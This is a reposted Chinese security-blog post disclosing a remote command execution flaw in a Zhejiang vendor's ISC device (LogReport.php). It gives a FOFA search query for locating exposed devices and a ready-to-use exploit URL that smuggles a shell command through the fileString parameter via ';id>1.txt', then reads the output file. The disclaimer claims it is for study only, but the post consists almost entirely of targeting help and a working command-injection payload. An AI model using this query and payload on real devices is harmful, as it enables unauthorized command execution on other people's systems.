浙江*视科技 ISC LogReport.php 远程命令执行漏洞

admin
admin
admin
143774
文章
118
评论
2023年12月12日16:27:09评论93 views字数 398阅读1分19秒阅读模式


一、免责声明:

      本次文章仅限个人学习使用,如有非法用途均与作者无关,且行且珍惜;由于传播、利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除整改并向您致以歉意。谢谢!


二、产品介绍:

浙江*视科技 ISC LogReport.php 远程命令执行漏洞

三、资产梳理

fofa: title=="ISC5000-E"

四、漏洞复现:

执行id命令,执行结果在1.txt中

http://target/Interface/LogReport/LogReport.php?action=execUpdate&fileString=x%3bid%3e1.txt

浙江*视科技 ISC LogReport.php 远程命令执行漏洞

查看执行结果:

http://target/Interface/LogReport/1.txt

浙江*视科技 ISC LogReport.php 远程命令执行漏洞




原文始发于微信公众号(fly的渗透学习笔记):浙江*视科技 ISC LogReport.php 远程命令执行漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月12日16:27:09
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   浙江*视科技 ISC LogReport.php 远程命令执行漏洞https://cn-sec.com/archives/2290756.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息